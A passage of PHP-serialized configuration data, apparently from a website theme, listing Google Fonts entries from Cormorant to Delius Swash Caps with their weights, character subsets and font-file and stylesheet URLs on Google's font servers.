alic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"500";i:5;s:9:"500italic";i:6;s:3:"600";i:7;s:9:"600italic";i:8;s:3:"700";i:9;s:9:"700italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:10:{i:300;s:87:"http://fonts.gstatic.com/s/cormorant/v1/diggKPcUerIA8GQWRVxsVS3USBnSvpkopQaUR-2r7iU.ttf";s:9:"300italic";s:87:"http://fonts.gstatic.com/s/cormorant/v1/UydD9tmk-DfLnEFRr_bBZy9-WlPSxbfiI49GsXo3q0g.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/cormorant/v1/9vWr5LgrNEgvhv1P3z9uuQ.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/cormorant/v1/zzcH3j00ejnIc8jicdcz6KCWcynf_cDxXwCLxiixG1c.ttf";i:500;s:87:"http://fonts.gstatic.com/s/cormorant/v1/lwoiMb1lzDf49h802vpRUy3USBnSvpkopQaUR-2r7iU.ttf";s:9:"500italic";s:87:"http://fonts.gstatic.com/s/cormorant/v1/UydD9tmk-DfLnEFRr_bBZ8CNfqCYlB_eIx7H1TVXe60.ttf";i:600;s:87:"http://fonts.gstatic.com/s/cormorant/v1/LKEtp8XimHLN0gSYqnV9qy3USBnSvpkopQaUR-2r7iU.ttf";s:9:"600italic";s:87:"http://fonts.gstatic.com/s/cormorant/v1/UydD9tmk-DfLnEFRr_bBZ5Z7xm-Bj30Bj2KNdXDzSZg.ttf";i:700;s:87:"http://fonts.gstatic.com/s/cormorant/v1/vOi7JV5F3JmPzXDgUqUwgS3USBnSvpkopQaUR-2r7iU.ttf";s:9:"700italic";s:87:"http://fonts.gstatic.com/s/cormorant/v1/UydD9tmk-DfLnEFRr_bBZ3e1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:10:{i:300;s:53:"https://fonts.googleapis.com/css?family=Cormorant:300";s:9:"300italic";s:59:"https://fonts.googleapis.com/css?family=Cormorant:300italic";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Cormorant:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Cormorant:italic";i:500;s:53:"https://fonts.googleapis.com/css?family=Cormorant:500";s:9:"500italic";s:59:"https://fonts.googleapis.com/css?family=Cormorant:500italic";i:600;s:53:"https://fonts.googleapis.com/css?family=Cormorant:600";s:9:"600italic";s:59:"https://fonts.googleapis.com/css?family=Cormorant:600italic";i:700;s:53:"https://fonts.googleapis.com/css?family=Cormorant:700";s:9:"700italic";s:59:"https://fonts.googleapis.com/css?family=Cormorant:700italic";}}s:18:"cormorant_garamond";a:7:{s:4:"name";s:18:"Cormorant Garamond";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"500";i:5;s:9:"500italic";i:6;s:3:"600";i:7;s:9:"600italic";i:8;s:3:"700";i:9;s:9:"700italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:10:{i:300;s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/iEjm9hVxcattz37Y8gZwVXDeRRUpi2fYbqcTC9PsYaU.ttf";s:9:"300italic";s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/zuqx3k1yUEl3Eavo-ZPEAjZXe39LdglsIzDOvKnCCso.ttf";s:7:"regular";s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/EI2hhCO6kSfLAy-Dpd8fd7_BES7rBA-D9Lo3vCx9yHc.ttf";s:6:"italic";s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/eGTlzchVxDKKvK6d7drzlkVlEttMzBRhK_wsRQ4MqEE.ttf";i:500;s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/iEjm9hVxcattz37Y8gZwVSkwnhSVYGQY4MSUB3uw374.ttf";s:9:"500italic";s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/zuqx3k1yUEl3Eavo-ZPEAq8qrY1CcUgPLrA3ytfr3SY.ttf";i:600;s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/iEjm9hVxcattz37Y8gZwVVc2xdGA7R8efE0K6NwSoyI.ttf";s:9:"600italic";s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/zuqx3k1yUEl3Eavo-ZPEAqms9Rm_p2hhD4xhClOGPEw.ttf";i:700;s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/iEjm9hVxcattz37Y8gZwVdNg01MkafbqNYmDx8wt95c.ttf";s:9:"700italic";s:95:"http://fonts.gstatic.com/s/cormorantgaramond/v1/zuqx3k1yUEl3Eavo-ZPEAvEntfLz8TC-DlAIEJQEwCA.ttf";}s:4:"urls";a:10:{i:300;s:62:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:300";s:9:"300italic";s:68:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:300italic";s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:regular";s:6:"italic";s:65:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:italic";i:500;s:62:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:500";s:9:"500italic";s:68:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:500italic";i:600;s:62:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:600";s:9:"600italic";s:68:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:600italic";i:700;s:62:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:700";s:9:"700italic";s:68:"https://fonts.googleapis.com/css?family=Cormorant+Garamond:700italic";}}s:16:"cormorant_infant";a:7:{s:4:"name";s:16:"Cormorant Infant";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"500";i:5;s:9:"500italic";i:6;s:3:"600";i:7;s:9:"600italic";i:8;s:3:"700";i:9;s:9:"700italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:10:{i:300;s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/MYRpw6pQIf0XStsiZXQWA_alucuYFvoGqpCMGloCN2Y.ttf";s:9:"300italic";s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/PK34LKusK6SSQFR2m5-LZgNCjGMFnYSoo4kW2wZNowE.ttf";s:7:"regular";s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/q5F0I_a42y_qtMoOtqdjagGlf-pqPDOheSBqZOVpkRo.ttf";s:6:"italic";s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/U6OamtMgLoVs0zd53Z1pNpbq6_N3pcDBvA-VsecMIAA.ttf";i:500;s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/MYRpw6pQIf0XStsiZXQWA4PJQ8Vh-2Qw35Pq7cVYzdo.ttf";s:9:"500italic";s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/PK34LKusK6SSQFR2m5-LZq9x-au7fLBTFpfuT52_G64.ttf";i:600;s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/MYRpw6pQIf0XStsiZXQWA9G0tNuOpbNMRdNl4S5e-n0.ttf";s:9:"600italic";s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/PK34LKusK6SSQFR2m5-LZkZbdnTqrL_1WMEFjxg0OwY.ttf";i:700;s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/MYRpw6pQIf0XStsiZXQWAx-3ZynwDtU_450Ho62jf_I.ttf";s:9:"700italic";s:93:"http://fonts.gstatic.com/s/cormorantinfant/v1/PK34LKusK6SSQFR2m5-LZmKEEmz9BBHY1o7RrRAiUXQ.ttf";}s:4:"urls";a:10:{i:300;s:60:"https://fonts.googleapis.com/css?family=Cormorant+Infant:300";s:9:"300italic";s:66:"https://fonts.googleapis.com/css?family=Cormorant+Infant:300italic";s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Cormorant+Infant:regular";s:6:"italic";s:63:"https://fonts.googleapis.com/css?family=Cormorant+Infant:italic";i:500;s:60:"https://fonts.googleapis.com/css?family=Cormorant+Infant:500";s:9:"500italic";s:66:"https://fonts.googleapis.com/css?family=Cormorant+Infant:500italic";i:600;s:60:"https://fonts.googleapis.com/css?family=Cormorant+Infant:600";s:9:"600italic";s:66:"https://fonts.googleapis.com/css?family=Cormorant+Infant:600italic";i:700;s:60:"https://fonts.googleapis.com/css?family=Cormorant+Infant:700";s:9:"700italic";s:66:"https://fonts.googleapis.com/css?family=Cormorant+Infant:700italic";}}s:12:"cormorant_sc";a:7:{s:4:"name";s:12:"Cormorant SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:5:{i:300;s:89:"http://fonts.gstatic.com/s/cormorantsc/v1/CCo4fI9EYzhUJcvojQ9Em6cQoVhARpoaILP7amxE_8g.ttf";s:7:"regular";s:89:"http://fonts.gstatic.com/s/cormorantsc/v1/o2HxNCgvhmwJdltu-68tzC3USBnSvpkopQaUR-2r7iU.ttf";i:500;s:89:"http://fonts.gstatic.com/s/cormorantsc/v1/CCo4fI9EYzhUJcvojQ9Em5MQuUSAwdHsY8ov_6tk1oA.ttf";i:600;s:89:"http://fonts.gstatic.com/s/cormorantsc/v1/CCo4fI9EYzhUJcvojQ9Em2v8CylhIUtwUiYO7Z2wXbE.ttf";i:700;s:89:"http://fonts.gstatic.com/s/cormorantsc/v1/CCo4fI9EYzhUJcvojQ9Em0D2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:5:{i:300;s:56:"https://fonts.googleapis.com/css?family=Cormorant+SC:300";s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Cormorant+SC:regular";i:500;s:56:"https://fonts.googleapis.com/css?family=Cormorant+SC:500";i:600;s:56:"https://fonts.googleapis.com/css?family=Cormorant+SC:600";i:700;s:56:"https://fonts.googleapis.com/css?family=Cormorant+SC:700";}}s:17:"cormorant_unicase";a:7:{s:4:"name";s:17:"Cormorant Unicase";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:5:{i:300;s:94:"http://fonts.gstatic.com/s/cormorantunicase/v1/-0mwRHhjEGfrz-UDHJ_78TyAYAK5JX1-zBpfFXu9t3Y.ttf";s:7:"regular";s:94:"http://fonts.gstatic.com/s/cormorantunicase/v1/THO7JMNV6qRoZlg7dU5RUz01TLsHlMvD1uPU3gXOh9s.ttf";i:500;s:94:"http://fonts.gstatic.com/s/cormorantunicase/v1/-0mwRHhjEGfrz-UDHJ_78WActzpz5sLElWWJpZBcHK4.ttf";i:600;s:94:"http://fonts.gstatic.com/s/cormorantunicase/v1/-0mwRHhjEGfrz-UDHJ_78U0bQT13XmwBbvkXy6Yb64Y.ttf";i:700;s:94:"http://fonts.gstatic.com/s/cormorantunicase/v1/-0mwRHhjEGfrz-UDHJ_78Z5CFeQBXku3ADXbkP2V7W8.ttf";}s:4:"urls";a:5:{i:300;s:61:"https://fonts.googleapis.com/css?family=Cormorant+Unicase:300";s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Cormorant+Unicase:regular";i:500;s:61:"https://fonts.googleapis.com/css?family=Cormorant+Unicase:500";i:600;s:61:"https://fonts.googleapis.com/css?family=Cormorant+Unicase:600";i:700;s:61:"https://fonts.googleapis.com/css?family=Cormorant+Unicase:700";}}s:17:"cormorant_upright";a:7:{s:4:"name";s:17:"Cormorant Upright";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:5:{i:300;s:94:"http://fonts.gstatic.com/s/cormorantupright/v1/PwJT_lCdbLUyVq-tARIPhjCfCvaSiUMfec2BKBTMAaw.ttf";s:7:"regular";s:94:"http://fonts.gstatic.com/s/cormorantupright/v1/0n68kajKjTOJn9EPQkf1a-ojtTJJf2MtgkoRSid3NcM.ttf";i:500;s:94:"http://fonts.gstatic.com/s/cormorantupright/v1/PwJT_lCdbLUyVq-tARIPhiWhx5Kr-bzfZXhgF-AnSvk.ttf";i:600;s:94:"http://fonts.gstatic.com/s/cormorantupright/v1/PwJT_lCdbLUyVq-tARIPhuDigFx2V_wQ4SOTZdg5a2s.ttf";i:700;s:94:"http://fonts.gstatic.com/s/cormorantupright/v1/PwJT_lCdbLUyVq-tARIPhuO6SP7lRr11seyd3AkK37Q.ttf";}s:4:"urls";a:5:{i:300;s:61:"https://fonts.googleapis.com/css?family=Cormorant+Upright:300";s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Cormorant+Upright:regular";i:500;s:61:"https://fonts.googleapis.com/css?family=Cormorant+Upright:500";i:600;s:61:"https://fonts.googleapis.com/css?family=Cormorant+Upright:600";i:700;s:61:"https://fonts.googleapis.com/css?family=Cormorant+Upright:700";}}s:9:"courgette";a:7:{s:4:"name";s:9:"Courgette";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/courgette/v4/2YO0EYtyE9HUPLZprahpZA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Courgette:regular";}}s:7:"cousine";a:7:{s:4:"name";s:7:"Cousine";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:8:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:6:"hebrew";i:7;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/cousine/v10/GYX4bPXObJNJo63QJEUnLg.ttf";s:6:"italic";s:65:"http://fonts.gstatic.com/s/cousine/v10/1WtIuajLoo8vjVwsrZ3eOg.ttf";i:700;s:86:"http://fonts.gstatic.com/s/cousine/v10/FXEOnNUcCzhdtoBxiq-lovesZW2xOQ-xsNqO47m55DA.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/cousine/v10/y_AZ5Sz-FwL1lux2xLSTZS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Cousine:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Cousine:italic";i:700;s:51:"https://fonts.googleapis.com/css?family=Cousine:700";s:9:"700italic";s:57:"https://fonts.googleapis.com/css?family=Cousine:700italic";}}s:8:"coustard";a:7:{s:4:"name";s:8:"Coustard";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"900";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/coustard/v6/iO2Rs5PmqAEAXoU3SkMVBg.ttf";i:900;s:86:"http://fonts.gstatic.com/s/coustard/v6/W02OCWO6OfMUHz6aVyegQ6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:2:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Coustard:regular";i:900;s:52:"https://fonts.googleapis.com/css?family=Coustard:900";}}s:21:"covered_by_your_grace";a:7:{s:4:"name";s:21:"Covered By Your Grace";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:96:"http://fonts.gstatic.com/s/coveredbyyourgrace/v6/6ozZp4BPlrbDRWPe3EBGA6CVUMdvnk-GcAiZQrX9Gek.ttf";}s:4:"urls";a:1:{s:7:"regular";s:69:"https://fonts.googleapis.com/css?family=Covered+By+Your+Grace:regular";}}s:12:"crafty_girls";a:7:{s:4:"name";s:12:"Crafty Girls";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/craftygirls/v5/0Sv8UWFFdhQmesHL32H8oy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Crafty+Girls:regular";}}s:9:"creepster";a:7:{s:4:"name";s:9:"Creepster";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/creepster/v5/0vdr5kWJ6aJlOg5JvxnXzQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Creepster:regular";}}s:11:"crete_round";a:7:{s:4:"name";s:11:"Crete Round";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/creteround/v5/B8EwN421qqOCCT8vOH4wJ6CWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/creteround/v5/5xAt7XK2vkUdjhGtt98unUeOrDcLawS7-ssYqLr2Xp4.ttf";}s:4:"urls";a:2:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Crete+Round:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Crete+Round:italic";}}s:12:"crimson_text";a:7:{s:4:"name";s:12:"Crimson Text";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"600";i:3;s:9:"600italic";i:4;s:3:"700";i:5;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:6:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/crimsontext/v6/3IFMwfRa07i-auYR-B-zNS3USBnSvpkopQaUR-2r7iU.ttf";s:6:"italic";s:89:"http://fonts.gstatic.com/s/crimsontext/v6/a5QZnvmn5amyNI-t2BMkWPMZXuCXbOrAvx5R0IT5Oyo.ttf";i:600;s:89:"http://fonts.gstatic.com/s/crimsontext/v6/rEy5tGc5HdXy56Xvd4f3I2v8CylhIUtwUiYO7Z2wXbE.ttf";s:9:"600italic";s:89:"http://fonts.gstatic.com/s/crimsontext/v6/4j4TR-EfnvCt43InYpUNDIR-5-urNOGAobhAyctHvW8.ttf";i:700;s:89:"http://fonts.gstatic.com/s/crimsontext/v6/rEy5tGc5HdXy56Xvd4f3I0D2ttfZwueP-QU272T9-k4.ttf";s:9:"700italic";s:89:"http://fonts.gstatic.com/s/crimsontext/v6/4j4TR-EfnvCt43InYpUNDPAs9-1nE9qOqhChW0m4nDE.ttf";}s:4:"urls";a:6:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Crimson+Text:regular";s:6:"italic";s:59:"https://fonts.googleapis.com/css?family=Crimson+Text:italic";i:600;s:56:"https://fonts.googleapis.com/css?family=Crimson+Text:600";s:9:"600italic";s:62:"https://fonts.googleapis.com/css?family=Crimson+Text:600italic";i:700;s:56:"https://fonts.googleapis.com/css?family=Crimson+Text:700";s:9:"700italic";s:62:"https://fonts.googleapis.com/css?family=Crimson+Text:700italic";}}s:13:"croissant_one";a:7:{s:4:"name";s:13:"Croissant One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/croissantone/v4/mPjsOObnC77fp1cvZlOfIYjjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Croissant+One:regular";}}s:7:"crushed";a:7:{s:4:"name";s:7:"Crushed";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/crushed/v6/aHwSejs3Kt0Lg95u7j32jA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Crushed:regular";}}s:6:"cuprum";a:7:{s:4:"name";s:6:"Cuprum";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/cuprum/v7/JgXs0F_UiaEdAS74msmFNg.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/cuprum/v7/cLEz0KV6OxInnktSzpk58g.ttf";i:700;s:63:"http://fonts.gstatic.com/s/cuprum/v7/6tl3_FkDeXSD72oEHuJh4w.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/cuprum/v7/bnkXaBfoYvaJ75axRPSwVKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:4:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Cuprum:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Cuprum:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Cuprum:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Cuprum:700italic";}}s:6:"cutive";a:7:{s:4:"name";s:6:"Cutive";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/cutive/v8/G2bW-ImyOCwKxBkLyz39YQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Cutive:regular";}}s:11:"cutive_mono";a:7:{s:4:"name";s:11:"Cutive Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/cutivemono/v4/ncWQtFVKcSs8OW798v30k6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Cutive+Mono:regular";}}s:6:"damion";a:7:{s:4:"name";s:6:"Damion";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/damion/v6/13XtECwKxhD_VrOqXL4SiA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Damion:regular";}}s:14:"dancing_script";a:7:{s:4:"name";s:14:"Dancing Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/dancingscript/v7/DK0eTGXiZjN6yA8zAEyM2RnpV0hQCek3EmWnCPrvGRM.ttf";i:700;s:91:"http://fonts.gstatic.com/s/dancingscript/v7/KGBfwabt0ZRLA5W1ywjowb_dAmXiKjTPGCuO6G2MbfA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Dancing+Script:regular";i:700;s:58:"https://fonts.googleapis.com/css?family=Dancing+Script:700";}}s:7:"dangrek";a:7:{s:4:"name";s:7:"Dangrek";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/dangrek/v8/LOaFhBT-EHNxZjV8DAW_ew.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Dangrek:regular";}}s:11:"david_libre";a:7:{s:4:"name";s:11:"David Libre";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:6:"hebrew";}s:5:"files";a:3:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/davidlibre/v1/Fp_YuX4CP0pzlSUtACdOo6CWcynf_cDxXwCLxiixG1c.ttf";i:500;s:88:"http://fonts.gstatic.com/s/davidlibre/v1/ea-623K8OFNeGhfSzdpmysCNfqCYlB_eIx7H1TVXe60.ttf";i:700;s:88:"http://fonts.gstatic.com/s/davidlibre/v1/ea-623K8OFNeGhfSzdpmyne1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:3:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=David+Libre:regular";i:500;s:55:"https://fonts.googleapis.com/css?family=David+Libre:500";i:700;s:55:"https://fonts.googleapis.com/css?family=David+Libre:700";}}s:20:"dawning_of_a_new_day";a:7:{s:4:"name";s:20:"Dawning of a New Day";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/dawningofanewday/v7/JiDsRhiKZt8uz3NJ5xA06gXLnohmOYWQZqo_sW8GLTk.ttf";}s:4:"urls";a:1:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=Dawning+of+a+New+Day:regular";}}s:8:"days_one";a:7:{s:4:"name";s:8:"Days One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/daysone/v6/kzwZjNhc1iabMsrc_hKBIA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Days+One:regular";}}s:5:"dekko";a:7:{s:4:"name";s:5:"Dekko";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/dekko/v3/AKtgABKC1rUxgIgS-bpojw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Dekko:regular";}}s:6:"delius";a:7:{s:4:"name";s:6:"Delius";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/delius/v6/TQA163qafki2-gV-B6F_ag.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Delius:regular";}}s:17:"delius_swash_caps";a:7:{s:4:"name";s:17:"Delius Swash 